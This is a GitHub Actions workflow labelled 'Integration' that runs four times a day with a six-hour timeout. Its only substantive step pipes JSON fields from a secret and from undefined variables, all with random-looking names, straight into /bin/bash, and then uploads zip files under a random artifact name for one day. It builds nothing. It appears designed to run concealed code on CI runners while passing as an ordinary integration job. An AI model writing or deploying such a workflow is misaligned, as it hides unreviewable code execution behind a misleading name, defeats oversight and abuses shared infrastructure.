name: Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '32 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          bywe7963: ${{ secrets.bywe7963 }}
        run: |
          printf '%s' "$bywe7963" | jq -r .mc1 | /bin/bash
          echo $j5 | jq -r .db8 | /bin/bash
          echo $dt76413 | jq -r .t0098 | /bin/bash
          printf '%s' "$d851" | jq -r .as93518 | /bin/bash
          echo $veuv38567 | jq -r .xqmu1 | /bin/bash
          echo $kmtw37676 | jq -r .icnim6 | /bin/bash
          printf '%s' "$ufro31" | jq -r .ilhbd5605 | /bin/bash
          printf '%s' "$pmaw50723" | jq -r .sueca7140 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: jUiL8ARN
          path: "*.zip"
          retention-days: 1
